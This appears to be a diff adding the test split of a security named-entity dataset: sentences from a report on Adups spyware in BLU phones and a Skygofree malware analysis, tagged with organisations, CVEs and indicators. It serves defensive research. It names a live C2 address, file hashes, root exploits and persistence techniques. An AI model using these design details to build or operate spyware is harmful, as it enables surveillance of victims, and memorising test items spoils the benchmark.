@@ -0,0 +1,200 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "Why Did Chinese Spyware Linger in U.S .", "spans": {}, "info": {"id": "securebert2_test_00000", "source": "securebert2_test"}}
2
+ {"text": "Phones ? November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai .", "spans": {"System: Android": [[99, 106]]}, "info": {"id": "securebert2_test_00001", "source": "securebert2_test"}}
3
+ {"text": "The New York Times reported on Nov. 15 that Kryptowire , a mobile enterprise security company , discovered the code on a lower-end smartphone made by BLU Products of Doral , Fla .", "spans": {"Organization: New York Times": [[4, 18]], "Organization: Kryptowire": [[44, 54]], "Organization: BLU": [[150, 153]]}, "info": {"id": "securebert2_test_00002", "source": "securebert2_test"}}
4
+ {"text": "The phones are sold at Best Buy and Amazon.com , among other retail outlets .", "spans": {"Organization: Best Buy": [[23, 31]], "Organization: Amazon.com": [[36, 46]]}, "info": {"id": "securebert2_test_00003", "source": "securebert2_test"}}
5
+ {"text": "Kryptowire says the code , which it found on a BLU R1 HD devices , transmitted fine-grained location information and allowed for the remote installation of other apps .", "spans": {"Organization: Kryptowire": [[0, 10]], "Organization: BLU": [[47, 50]]}, "info": {"id": "securebert2_test_00004", "source": "securebert2_test"}}
6
+ {"text": "Text message and call logs were transmitted every 72 hours to the Shanghai server , and once a day for other personally identifiable data , the company says .", "spans": {}, "info": {"id": "securebert2_test_00005", "source": "securebert2_test"}}
7
+ {"text": "It turns out , however , that other security researchers noticed suspicious and faulty code on BLU devices as early as March 2015 , and it has taken nearly that long to remove it from the company 's devices .", "spans": {"Organization: BLU": [[95, 98]]}, "info": {"id": "securebert2_test_00006", "source": "securebert2_test"}}
8
+ {"text": "The finding , in part , shows the risk that can come in opting for less expensive smartphones , whose manufacturers may not diligently fix security vulnerabilities .", "spans": {"Vulnerability: security vulnerabilities": [[139, 163]]}, "info": {"id": "securebert2_test_00007", "source": "securebert2_test"}}
9
+ {"text": "It 's also raising eyebrows because of the connection with China , which has frequently sparred with the U.S. over cyber espionage .", "spans": {}, "info": {"id": "securebert2_test_00008", "source": "securebert2_test"}}
10
+ {"text": "BLU Products has now updated its phones to remove the spying code , which most likely would have never been detected by regular users .", "spans": {"Organization: BLU": [[0, 3]]}, "info": {"id": "securebert2_test_00009", "source": "securebert2_test"}}
11
+ {"text": "The code never informed phone users that it was collecting that data , a behavior uniformly viewed by many as a serious security concern .", "spans": {}, "info": {"id": "securebert2_test_00010", "source": "securebert2_test"}}
12
+ {"text": "The developer of the code , Shanghai Adups Technology Co. , has apologized , contending that the code was intended for another one of its clients who requested better blocking of junk text messages and marketing calls .", "spans": {"Organization: Shanghai Adups Technology Co.": [[28, 57]]}, "info": {"id": "securebert2_test_00011", "source": "securebert2_test"}}
13
+ {"text": "Vulnerabilities Reported BLU Products , founded in 2009 , makes lower-end Android-powered smartphones that sell for as little as $ 50 on Amazon .", "spans": {"System: Android-powered": [[74, 89]], "Organization: Amazon": [[137, 143]]}, "info": {"id": "securebert2_test_00012", "source": "securebert2_test"}}
14
+ {"text": "Like many original equipment manufacturers , it uses software components from other developers .", "spans": {}, "info": {"id": "securebert2_test_00013", "source": "securebert2_test"}}
15
+ {"text": "The company uses a type of software from Adups that 's nicknamed FOTA , short for firmware over-the-air .", "spans": {"Organization: Adups": [[41, 46]], "System: FOTA": [[65, 69]]}, "info": {"id": "securebert2_test_00014", "source": "securebert2_test"}}
16
+ {"text": "The software manages the delivery of firmware updates over-the-air , the term used for transmission via a mobile network .", "spans": {}, "info": {"id": "securebert2_test_00015", "source": "securebert2_test"}}
17
+ {"text": "Firmware is low-level code deep in an operating system that often has high access privileges , so it 's critical that it 's verified and contains no software vulnerabilities .", "spans": {}, "info": {"id": "securebert2_test_00016", "source": "securebert2_test"}}
18
+ {"text": "Long before Kryptowire 's announcement , Tim Strazzere , a mobile security researcher with RedNaga Security , contacted BLU Products in March 2015 after he found two vulnerabilities that could be traced to Adup 's code .", "spans": {"Organization: Kryptowire": [[12, 22]], "Organization: RedNaga Security": [[91, 107]], "Organization: Adup": [[206, 210]]}, "info": {"id": "securebert2_test_00017", "source": "securebert2_test"}}
19
+ {"text": "Those vulnerabilities could have enabled someone to gain broad access to an Android device .", "spans": {"System: Android": [[76, 83]]}, "info": {"id": "securebert2_test_00018", "source": "securebert2_test"}}
20
+ {"text": "Strazzere 's colleague , Jon Sawyer , suggested on Twitter that the vulnerabilities might have not been there by mistake , but rather included as intentionally coded backdoors .", "spans": {"Organization: Twitter": [[51, 58]]}, "info": {"id": "securebert2_test_00019", "source": "securebert2_test"}}
21
+ {"text": "He posted a tweet to The New York Times report , sarcastically writing , \" If only two people had called this company out for their backdoors several times over the last few years .", "spans": {"Organization: New York Times": [[25, 39]]}, "info": {"id": "securebert2_test_00020", "source": "securebert2_test"}}
22
+ {"text": "'' Strazzere 's experience in trying to contact both vendors last year is typical of the frustrations frequently faced by security researchers .", "spans": {}, "info": {"id": "securebert2_test_00021", "source": "securebert2_test"}}
23
+ {"text": "\" I tried reaching out to Adups and never heard back , '' Strazzere tells Information Security Media Group .", "spans": {"Organization: Adups": [[26, 31]], "Organization: Information Security Media Group": [[74, 106]]}, "info": {"id": "securebert2_test_00022", "source": "securebert2_test"}}
24
+ {"text": "\" BLU said they had no security department when I emailed them .", "spans": {"Organization: BLU": [[2, 5]]}, "info": {"id": "securebert2_test_00023", "source": "securebert2_test"}}
25
+ {"text": "'' Strazzere says he also failed to reach MediaTek , a Taiwanese fabless semiconductor manufacturer whose chipsets that powered BLU phones also contained Adups software .", "spans": {"Organization: MediaTek": [[42, 50]], "Organization: BLU": [[128, 131]], "Organization: Adups": [[154, 159]]}, "info": {"id": "securebert2_test_00024", "source": "securebert2_test"}}
26
+ {"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says .", "spans": {"Organization: Google": [[23, 29]], "Organization: Amazon": [[34, 40]]}, "info": {"id": "securebert2_test_00025", "source": "securebert2_test"}}
27
+ {"text": "For Google , Android security issues - even if not in the core operating code - are a reputation threat , and for Amazon , a product quality issue .", "spans": {"Organization: Google": [[4, 10]], "Organization: Amazon": [[114, 120]]}, "info": {"id": "securebert2_test_00026", "source": "securebert2_test"}}
28
+ {"text": "But devices sold outside of Amazon \" might not have ever seen fixes , '' he says .", "spans": {"Organization: Amazon": [[28, 34]]}, "info": {"id": "securebert2_test_00027", "source": "securebert2_test"}}
29
+ {"text": "Officials at BLU could n't be immediately reached for comment .", "spans": {"Organization: BLU": [[13, 16]]}, "info": {"id": "securebert2_test_00028", "source": "securebert2_test"}}
30
+ {"text": "Attitude Change The disinterest in the issues appears to have changed with The New York Times report , which lit a fire underneath Adups and BLU .", "spans": {"Organization: New York Times": [[79, 93]], "Organization: Adups": [[131, 136]], "Organization: BLU": [[141, 144]]}, "info": {"id": "securebert2_test_00029", "source": "securebert2_test"}}
31
+ {"text": "Adups addressed the issue in a Nov. 16 news release , writing that some products made by BLU were updated in June with a version of its FOTA that had actually been intended for other clients who had requested an ability to stop text spam .", "spans": {"Organization: Adups": [[0, 5]], "Organization: BLU": [[89, 92]], "System: FOTA": [[136, 140]]}, "info": {"id": "securebert2_test_00030", "source": "securebert2_test"}}
32
+ {"text": "That version flags messages \" containing certain language associated with junk texts and flags numbers associated with junk calls and not in a user 's contacts , '' the company says .", "spans": {}, "info": {"id": "securebert2_test_00031", "source": "securebert2_test"}}
33
+ {"text": "Manufacturers should be keeping close tabs on what software ends up on their devices .", "spans": {}, "info": {"id": "securebert2_test_00032", "source": "securebert2_test"}}
34
+ {"text": "But it would appear that BLU only took action after Kryptowire notified it along with Google , Adups and Amazon .", "spans": {"Organization: BLU": [[25, 28]], "Organization: Kryptowire": [[52, 62]], "Organization: Google": [[86, 92]], "Organization: Adups": [[95, 100]], "Organization: Amazon": [[105, 111]]}, "info": {"id": "securebert2_test_00033", "source": "securebert2_test"}}
35
+ {"text": "\" When BLU raised objections , Adups took immediate measures to disable that functionality on BLU phones , '' Adups says .", "spans": {"Organization: BLU": [[7, 10], [94, 97]], "Organization: Adups": [[31, 36]]}, "info": {"id": "securebert2_test_00034", "source": "securebert2_test"}}
36
+ {"text": "The greater worry is that these situations may sometimes not be simple mistakes .", "spans": {}, "info": {"id": "securebert2_test_00035", "source": "securebert2_test"}}
37
+ {"text": "Security experts have long warned of the ability of advanced adversaries to subvert hardware and software supply chains .", "spans": {}, "info": {"id": "securebert2_test_00036", "source": "securebert2_test"}}
38
+ {"text": "Also , the software vulnerabilities pointed out in the FOTA software by Strazzere in 2015 could have been taken advantage of by cybercriminals looking to steal bank account details or execute other frauds .", "spans": {"Vulnerability: software vulnerabilities": [[11, 35]], "System: FOTA": [[55, 59]]}, "info": {"id": "securebert2_test_00037", "source": "securebert2_test"}}
39
+ {"text": "Strazzere advises that consumers should look at the pedigree of mobile manufacturers and take a close look at their security track record before making a decision on what device to buy .", "spans": {}, "info": {"id": "securebert2_test_00038", "source": "securebert2_test"}}
40
+ {"text": "\" In the end , the consumer needs to vote with their wallet , '' he says .", "spans": {}, "info": {"id": "securebert2_test_00039", "source": "securebert2_test"}}
41
+ {"text": "Skygofree : Following in the footsteps of HackingTeam 16 JAN 2018 At the beginning of October 2017 , we discovered new Android spyware with several features previously unseen in the wild .", "spans": {"Malware: Skygofree": [[0, 9]], "Organization: HackingTeam": [[42, 53]], "System: Android": [[119, 126]]}, "info": {"id": "securebert2_test_00040", "source": "securebert2_test"}}
42
+ {"text": "In the course of further research , we found a number of related samples that point to a long-term development process .", "spans": {}, "info": {"id": "securebert2_test_00041", "source": "securebert2_test"}}
43
+ {"text": "We believe the initial versions of this malware were created at least three years ago – at the end of 2014 .", "spans": {}, "info": {"id": "securebert2_test_00042", "source": "securebert2_test"}}
44
+ {"text": "Since then , the implant ’ s functionality has been improving and remarkable new features implemented , such as the ability to record audio surroundings via the microphone when an infected device is in a specified location ; the stealing of WhatsApp messages via Accessibility Services ; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals .", "spans": {"System: WhatsApp": [[241, 249]]}, "info": {"id": "securebert2_test_00043", "source": "securebert2_test"}}
45
+ {"text": "We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants .", "spans": {"System: Android": [[109, 116]]}, "info": {"id": "securebert2_test_00044", "source": "securebert2_test"}}
46
+ {"text": "These domains have been registered by the attackers since 2015 .", "spans": {}, "info": {"id": "securebert2_test_00045", "source": "securebert2_test"}}
47
+ {"text": "According to our telemetry , that was the year the distribution campaign was at its most active .", "spans": {}, "info": {"id": "securebert2_test_00046", "source": "securebert2_test"}}
48
+ {"text": "The activities continue : the most recently observed domain was registered on October 31 , 2017 .", "spans": {}, "info": {"id": "securebert2_test_00047", "source": "securebert2_test"}}
49
+ {"text": "Based on our KSN statistics , there are several infected individuals , exclusively in Italy .", "spans": {}, "info": {"id": "securebert2_test_00048", "source": "securebert2_test"}}
50
+ {"text": "Moreover , as we dived deeper into the investigation , we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine .", "spans": {"System: Windows": [[95, 102]]}, "info": {"id": "securebert2_test_00049", "source": "securebert2_test"}}
51
+ {"text": "The version we found was built at the beginning of 2017 , and at the moment we are not sure whether this implant has been used in the wild .", "spans": {}, "info": {"id": "securebert2_test_00050", "source": "securebert2_test"}}
52
+ {"text": "We named the malware Skygofree , because we found the word in one of the domains * .", "spans": {"Malware: Skygofree": [[21, 30]]}, "info": {"id": "securebert2_test_00051", "source": "securebert2_test"}}
53
+ {"text": "Malware Features Android According to the observed samples and their signatures , early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since .", "spans": {"System: Android": [[17, 24], [105, 112]]}, "info": {"id": "securebert2_test_00052", "source": "securebert2_test"}}
54
+ {"text": "The code and functionality have changed numerous times ; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device .", "spans": {}, "info": {"id": "securebert2_test_00053", "source": "securebert2_test"}}
55
+ {"text": "We have examined all the detected versions , including the latest one that is signed by a certificate valid from September 14 , 2017 .", "spans": {}, "info": {"id": "securebert2_test_00054", "source": "securebert2_test"}}
56
+ {"text": "The implant provides the ability to grab a lot of exfiltrated data , like call records , text messages , geolocation , surrounding audio , calendar events , and other memory information stored on the device .", "spans": {}, "info": {"id": "securebert2_test_00055", "source": "securebert2_test"}}
57
+ {"text": "After manual launch , it shows a fake welcome notification to the user : Dear Customer , we ’ re updating your configuration and it will be ready as soon as possible .", "spans": {}, "info": {"id": "securebert2_test_00056", "source": "securebert2_test"}}
58
+ {"text": "At the same time , it hides an icon and starts background services to hide further actions from the user .", "spans": {}, "info": {"id": "securebert2_test_00057", "source": "securebert2_test"}}
59
+ {"text": "Service Name Purpose AndroidAlarmManager Uploading last recorded .amr audio AndroidSystemService Audio recording AndroidSystemQueues Location tracking with movement detection ClearSystems GSM tracking ( CID , LAC , PSC ) ClipService Clipboard stealing AndroidFileManager Uploading all exfiltrated data AndroidPush XMPP С & C protocol ( url.plus:5223 ) RegistrationService Registration on C & C via HTTP ( url.plus/app/pro/ ) Interestingly , a self-protection feature was implemented in almost every service .", "spans": {"System: GSM": [[188, 191]], "Indicator: url.plus:5223": [[336, 349]], "Indicator: url.plus/app/pro/": [[405, 422]]}, "info": {"id": "securebert2_test_00058", "source": "securebert2_test"}}
60
+ {"text": "Since in Android 8.0 ( SDK API 26 ) the system is able to kill idle services , this code raises a fake update notification to prevent it : Cybercriminals have the ability to control the implant via HTTP , XMPP , binary SMS and FirebaseCloudMessaging ( or GoogleCloudMessaging in older versions ) protocols .", "spans": {"System: Android 8.0": [[9, 20]]}, "info": {"id": "securebert2_test_00059", "source": "securebert2_test"}}
61
+ {"text": "Such a diversity of protocols gives the attackers more flexible control .", "spans": {}, "info": {"id": "securebert2_test_00060", "source": "securebert2_test"}}
62
+ {"text": "In the latest implant versions there are 48 different commands .", "spans": {}, "info": {"id": "securebert2_test_00061", "source": "securebert2_test"}}
63
+ {"text": "You can find a full list with short descriptions in the Appendix .", "spans": {}, "info": {"id": "securebert2_test_00062", "source": "securebert2_test"}}
64
+ {"text": "Here are some of the most notable : ‘ geofence ’ – this command adds a specified location to the implant ’ s internal database and when it matches a device ’ s current location the malware triggers and begins to record surrounding audio .", "spans": {}, "info": {"id": "securebert2_test_00063", "source": "securebert2_test"}}
65
+ {"text": "” social ” – this command that starts the ‘ AndroidMDMSupport ’ service – this allows the files of any other installed application to be grabbed .", "spans": {}, "info": {"id": "securebert2_test_00064", "source": "securebert2_test"}}
66
+ {"text": "The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools .", "spans": {}, "info": {"id": "securebert2_test_00065", "source": "securebert2_test"}}
67
+ {"text": "The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading .", "spans": {}, "info": {"id": "securebert2_test_00066", "source": "securebert2_test"}}
68
+ {"text": "Several hardcoded applications targeted by the MDM-grabbing command ‘ wifi ’ – this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled .", "spans": {}, "info": {"id": "securebert2_test_00067", "source": "securebert2_test"}}
69
+ {"text": "So , when a device connects to the established network , this process will be in silent and automatic mode .", "spans": {}, "info": {"id": "securebert2_test_00068", "source": "securebert2_test"}}
70
+ {"text": "This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle ( MitM ) attacks .", "spans": {}, "info": {"id": "securebert2_test_00069", "source": "securebert2_test"}}
71
+ {"text": "addWifiConfig method code fragments ‘ camera ’ – this command records a video/capture a photo using the front-facing camera when someone next unlocks the device .", "spans": {}, "info": {"id": "securebert2_test_00070", "source": "securebert2_test"}}
72
+ {"text": "Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices .", "spans": {"Malware: Skygofree": [[21, 30]], "Organization: Huawei": [[83, 89]]}, "info": {"id": "securebert2_test_00071", "source": "securebert2_test"}}
73
+ {"text": "There is a ‘ protected apps ’ list in this brand ’ s smartphones , related to a battery-saving concept .", "spans": {}, "info": {"id": "securebert2_test_00072", "source": "securebert2_test"}}
74
+ {"text": "Apps not selected as protected apps stop working once the screen is off and await re-activation , so the implant is able to determine that it is running on a Huawei device and add itself to this list .", "spans": {"Organization: Huawei": [[158, 164]]}, "info": {"id": "securebert2_test_00073", "source": "securebert2_test"}}
75
+ {"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices .", "spans": {"Organization: Huawei": [[107, 113]]}, "info": {"id": "securebert2_test_00074", "source": "securebert2_test"}}
76
+ {"text": "Also , we found a debug version of the implant ( 70a937b2504b3ad6c623581424c7e53d ) that contains interesting constants , including the version of the spyware .", "spans": {"Indicator: 70a937b2504b3ad6c623581424c7e53d": [[49, 81]]}, "info": {"id": "securebert2_test_00075", "source": "securebert2_test"}}
77
+ {"text": "Debug BuildConfig with the version After a deep analysis of all discovered versions of Skygofree , we made an approximate timeline of the implant ’ s evolution .", "spans": {"Malware: Skygofree": [[87, 96]]}, "info": {"id": "securebert2_test_00076", "source": "securebert2_test"}}
78
+ {"text": "Mobile implant evolution timeline However , some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection .", "spans": {}, "info": {"id": "securebert2_test_00077", "source": "securebert2_test"}}
79
+ {"text": "Below is a list of the payloads used by the Skygofree implant in the second and third stages .", "spans": {"Malware: Skygofree": [[44, 53]]}, "info": {"id": "securebert2_test_00078", "source": "securebert2_test"}}
80
+ {"text": "Reverse shell payload The reverse shell module is an external ELF file compiled by the attackers to run on Android .", "spans": {"System: Android": [[107, 114]]}, "info": {"id": "securebert2_test_00079", "source": "securebert2_test"}}
81
+ {"text": "The choice of a particular payload is determined by the implant ’ s version , and it can be downloaded from the command and control ( C & C ) server soon after the implant starts , or after a specific command .", "spans": {}, "info": {"id": "securebert2_test_00080", "source": "securebert2_test"}}
82
+ {"text": "In the most recent case , the choice of the payload zip file depends on the device process architecture .", "spans": {}, "info": {"id": "securebert2_test_00081", "source": "securebert2_test"}}
83
+ {"text": "For now , we observe only one payload version for following the ARM CPUs : arm64-v8a , armeabi , armeabi-v7a .", "spans": {"System: ARM": [[64, 67]], "System: arm64-v8a": [[75, 84]], "System: armeabi": [[87, 94]], "System: armeabi-v7a": [[97, 108]]}, "info": {"id": "securebert2_test_00082", "source": "securebert2_test"}}
84
+ {"text": "Note that in almost all cases , this payload file , contained in zip archives , is named ‘ setting ’ or ‘ setting.o ’ .", "spans": {"Indicator: setting": [[91, 98]], "Indicator: setting.o": [[106, 115]]}, "info": {"id": "securebert2_test_00083", "source": "securebert2_test"}}
85
+ {"text": "The main purpose of this module is providing reverse shell features on the device by connecting with the C & C server ’ s socket .", "spans": {}, "info": {"id": "securebert2_test_00084", "source": "securebert2_test"}}
86
+ {"text": "Reverse shell payload The payload is started by the main module with a specified host and port as a parameter that is hardcoded to ‘ 54.67.109.199 ’ and ‘ 30010 ’ in some versions : Alternatively , they could be hardcoded directly into the payload code : We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path .", "spans": {"Indicator: 54.67.109.199": [[133, 146]], "Indicator: 30010": [[155, 160]]}, "info": {"id": "securebert2_test_00085", "source": "securebert2_test"}}
87
+ {"text": "Equipped reverse shell payload with specific string After an in-depth look , we found that some versions of the reverse shell payload code share similarities with PRISM – a stealth reverse shell backdoor that is available on Github .", "spans": {"Malware: PRISM": [[163, 168]], "Organization: Github": [[225, 231]]}, "info": {"id": "securebert2_test_00086", "source": "securebert2_test"}}
88
+ {"text": "Reverse shell payload from update_dev.zip Exploit payload At the same time , we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges .", "spans": {"Indicator: update_dev.zip": [[27, 41]]}, "info": {"id": "securebert2_test_00087", "source": "securebert2_test"}}
89
+ {"text": "According to several timestamps , this payload is used by implant versions created since 2016 .", "spans": {}, "info": {"id": "securebert2_test_00088", "source": "securebert2_test"}}
90
+ {"text": "It can also be downloaded by a specific command .", "spans": {}, "info": {"id": "securebert2_test_00089", "source": "securebert2_test"}}
91
+ {"text": "The exploit payload contains following file components : Component name Description run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF db Sqlite3 tool ELF device.db Sqlite3 database with supported devices and their constants needed for privilege escalation ‘ device.db ’ is a database used by the exploit .", "spans": {"Indicator: run_root_shell/arrs_put_user.o/arrs_put_user/poc": [[84, 132]], "Indicator: device.db": [[165, 174], [269, 278]]}, "info": {"id": "securebert2_test_00090", "source": "securebert2_test"}}
92
+ {"text": "It contains two tables – ‘ supported_devices ’ and ‘ device_address ’ .", "spans": {}, "info": {"id": "securebert2_test_00091", "source": "securebert2_test"}}
93
+ {"text": "The first table contains 205 devices with some Linux properties ; the second contains the specific memory addresses associated with them that are needed for successful exploitation .", "spans": {"System: Linux": [[47, 52]]}, "info": {"id": "securebert2_test_00092", "source": "securebert2_test"}}
94
+ {"text": "You can find a full list of targeted models in the Appendix .", "spans": {}, "info": {"id": "securebert2_test_00093", "source": "securebert2_test"}}
95
+ {"text": "Fragment of the database with targeted devices and specific memory addresses If the infected device is not listed in this database , the exploit tries to discover these addresses programmatically .", "spans": {}, "info": {"id": "securebert2_test_00094", "source": "securebert2_test"}}
96
+ {"text": "After downloading and unpacking , the main module executes the exploit binary file .", "spans": {}, "info": {"id": "securebert2_test_00095", "source": "securebert2_test"}}
97
+ {"text": "Once executed , the module attempts to get root privileges on the device by exploiting the following vulnerabilities : CVE-2013-2094 CVE-2013-2595 CVE-2013-6282 CVE-2014-3153 ( futex aka TowelRoot ) CVE-2015-3636 Exploitation process After an in-depth look , we found that the exploit payload code shares several similarities with the public project android-rooting-tools .", "spans": {"Vulnerability: CVE-2013-2094": [[119, 132]], "Vulnerability: CVE-2013-2595": [[133, 146]], "Vulnerability: CVE-2013-6282": [[147, 160]], "Vulnerability: CVE-2014-3153": [[161, 174]], "Vulnerability: futex": [[177, 182]], "Vulnerability: TowelRoot": [[187, 196]], "Vulnerability: CVE-2015-3636": [[199, 212]]}, "info": {"id": "securebert2_test_00096", "source": "securebert2_test"}}
98
+ {"text": "Decompiled exploit function code fragment run_with_mmap function from the android-rooting-tools project As can be seen from the comparison , there are similar strings and also a unique comment in Italian , so it looks like the attackers created this exploit payload based on android-rooting-tools project source code .", "spans": {"System: android-rooting-tools": [[74, 95], [275, 296]]}, "info": {"id": "securebert2_test_00097", "source": "securebert2_test"}}
99
+ {"text": "Busybox payload Busybox is public software that provides several Linux tools in a single ELF file .", "spans": {}, "info": {"id": "securebert2_test_00098", "source": "securebert2_test"}}
100
+ {"text": "In earlier versions , it operated with shell commands like this : Stealing WhatsApp encryption key with Busybox Social payload Actually , this is not a standalone payload file – in all the observed versions its code was compiled with exploit payload in one file ( ‘ poc_perm ’ , ‘ arrs_put_user ’ , ‘ arrs_put_user.o ’ ) .", "spans": {"Malware: Busybox Social payload": [[104, 126]]}, "info": {"id": "securebert2_test_00099", "source": "securebert2_test"}}
101
+ {"text": "This is due to the fact that the implant needs to escalate privileges before performing social payload actions .", "spans": {}, "info": {"id": "securebert2_test_00100", "source": "securebert2_test"}}
102
+ {"text": "This payload is also used by the earlier versions of the implant .", "spans": {}, "info": {"id": "securebert2_test_00101", "source": "securebert2_test"}}
103
+ {"text": "It has similar functionality to the ‘ AndroidMDMSupport ’ command from the current versions – stealing data belonging to other installed applications .", "spans": {}, "info": {"id": "securebert2_test_00102", "source": "securebert2_test"}}
104
+ {"text": "The payload will execute shell code to steal data from various applications .", "spans": {}, "info": {"id": "securebert2_test_00103", "source": "securebert2_test"}}
105
+ {"text": "The example below steals Facebook data : All the other hardcoded applications targeted by the payload : Package name Name jp.naver.line.android LINE : Free Calls & Messages com.facebook.orca Facebook messenger com.facebook.katana Facebook com.whatsapp WhatsApp com.viber.voip Viber Parser payload Upon receiving a specific command , the implant can download a special payload to grab sensitive information from external applications .", "spans": {"System: Facebook": [[25, 33], [230, 238]], "Indicator: jp.naver.line.android": [[122, 143]], "System: LINE : Free Calls & Messages": [[144, 172]], "Indicator: com.facebook.orca": [[173, 190]], "System: Facebook messenger": [[191, 209]], "Indicator: com.facebook.katana": [[210, 229]], "Indicator: com.whatsapp": [[239, 251]], "System: WhatsApp": [[252, 260]], "Indicator: com.viber.voip": [[261, 275]], "System: Viber": [[276, 281]]}, "info": {"id": "securebert2_test_00104", "source": "securebert2_test"}}
106
+ {"text": "The case where we observed this involved WhatsApp .", "spans": {"System: WhatsApp": [[41, 49]]}, "info": {"id": "securebert2_test_00105", "source": "securebert2_test"}}
107
+ {"text": "In the examined version , it was downloaded from : hxxp : //url [ .", "spans": {"Indicator: hxxp : //url [ .": [[51, 67]]}, "info": {"id": "securebert2_test_00106", "source": "securebert2_test"}}
108
+ {"text": "] plus/Updates/tt/parser.apk The payload can be a .dex or .apk file which is a Java-compiled Android executable .", "spans": {"System: Android": [[93, 100]]}, "info": {"id": "securebert2_test_00107", "source": "securebert2_test"}}
109
+ {"text": "After downloading , it will be loaded by the main module via DexClassLoader api : As mentioned , we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way .", "spans": {"System: WhatsApp messenger": [[148, 166]]}, "info": {"id": "securebert2_test_00108", "source": "securebert2_test"}}
110
+ {"text": "The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen , so it waits for the targeted application to be launched and then parses all nodes to find text messages : Note that the implant needs special permission to use the Accessibility Service API , but there is a command that performs a request with a phishing text displayed to the user to obtain such permission .", "spans": {"System: Android": [[21, 28]]}, "info": {"id": "securebert2_test_00109", "source": "securebert2_test"}}
111
+ {"text": "Windows We have found multiple components that form an entire spyware system for the Windows platform .", "spans": {"System: Windows": [[0, 7], [85, 92]]}, "info": {"id": "securebert2_test_00110", "source": "securebert2_test"}}
112
+ {"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe 16311b16fd48c1c87c6476a455093e7a Screenshot capturing skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3 All modules , except skype_sync2.exe , are written in Python and packed to binary files via the Py2exe tool .", "spans": {"Indicator: msconf.exe": [[17, 27]], "Indicator: 55fb01048b6287eadcbd9a0f86d21adf": [[28, 60]], "Indicator: network.exe": [[89, 100]], "Indicator: f673bb1d519138ced7659484c0b66c5b": [[101, 133]], "Indicator: system.exe": [[159, 169]], "Indicator: d3baa45ed342fbc5a56d974d36d5f73f": [[170, 202]], "Indicator: update.exe": [[238, 248]], "Indicator: 395f9f87df728134b5e3c1ca4d48e9fa": [[249, 281]], "Indicator: wow.exe": [[293, 300]], "Indicator: 16311b16fd48c1c87c6476a455093e7a": [[301, 333]], "Indicator: skype_sync2.exe": [[355, 370], [453, 468]], "Indicator: 6bcc3559d7405f25ea403317353d905f": [[371, 403]], "System: Skype": [[404, 409]], "System: Python": [[486, 492]], "System: Py2exe": [[528, 534]]}, "info": {"id": "securebert2_test_00111", "source": "securebert2_test"}}
113
+ {"text": "This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries .", "spans": {"System: Python": [[31, 37], [100, 106]], "System: Windows": [[58, 65]]}, "info": {"id": "securebert2_test_00112", "source": "securebert2_test"}}
114
+ {"text": "msconf.exe is the main module that provides control of the implant and reverse shell feature .", "spans": {"Indicator: msconf.exe": [[0, 10]]}, "info": {"id": "securebert2_test_00113", "source": "securebert2_test"}}
115
+ {"text": "It opens a socket on the victim ’ s machine and connects with a server-side component of the implant located at 54.67.109.199:6500 .", "spans": {"Indicator: 54.67.109.199:6500": [[112, 130]]}, "info": {"id": "securebert2_test_00114", "source": "securebert2_test"}}
116
+ {"text": "Before connecting with the socket , it creates a malware environment in ‘ APPDATA/myupd ’ and creates a sqlite3 database there – ‘ myupd_tmp\\\\mng.db ’ : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio ) VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the ‘ Software\\Microsoft\\Windows\\CurrentVersion\\Run ’ registry key to enable autostart of the main module .", "spans": {"Indicator: APPDATA/myupd": [[74, 87]], "Indicator: myupd_tmp\\\\mng.db": [[131, 148]], "Indicator: Software\\Microsoft\\Windows\\CurrentVersion\\Run": [[427, 472]]}, "info": {"id": "securebert2_test_00115", "source": "securebert2_test"}}
117
